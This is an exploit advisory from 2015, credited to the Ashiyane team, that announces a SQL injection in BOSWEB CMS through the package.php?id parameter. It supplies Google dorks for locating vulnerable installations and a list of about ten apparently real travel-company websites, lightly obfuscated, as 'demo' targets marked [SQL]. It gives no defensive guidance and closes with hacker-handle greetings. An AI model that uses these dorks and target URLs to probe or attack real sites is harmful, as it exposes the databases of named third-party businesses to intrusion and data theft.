##################################################
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Exploit Title : BOSWEB CMS SQL Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage: www.bosweb.co.id
Google Dork 1 : Powered by BOSWEB
Google Dork 2 : inurl:/package.php?id= intext:Powered by BOSWEB
Date : 24 / 4 / 2015
Tested On : windows se7en + linux Kali
MY HOME : ASHIYANE.ORG
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
################################################################################
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
::: >> ASHIYANE THE FIRST SECURITY FORUM IN IRAN << :::
~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~~ ~~ ~ ~~> Location <~ ~ ~
WEBSITE/package.php?id=[SQL]
~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> DEMO <~ ~ ~
http://www.thomasadventXure.com/package.php?id=2[SQL]
http://balipremierholidayXs.com/package.php?id=3[SQL]
http://www.balibesttur.Xcom/package.php?id=3[SQL]
http://balinewholiday.Xcom/package.php?id=5[SQL]
http://www.balinaturXalexperience.com/package.php?id=3[SQL]
http://www.agusbalXijourney.com/package.php?id=5[SQL]
http://balitriassatoXur.com/package.php?id=8[SQL]
http://komodofloXressea-landexplorer.com/package.php?id=3[SQL]
http://www.thoXmasadventure.com/package.php?id=2[SQL]
http://surfbaliXadventures.com/package.php?id=6[SQL]
And Google More . . .
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
################################################################################
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Discovered by : SeRaVo.BlackHat [^] H.4.S.S.4.N [^]
MY TEACHER : H_SQLI.EMpiRe > Ac!D > MMA Defacer > ACC3SS > Cyb3r_Dr4in > eb051
General.BlackHat@Gmail.com ~ www.facebook.com/general.blackhat
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
################################################################################
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_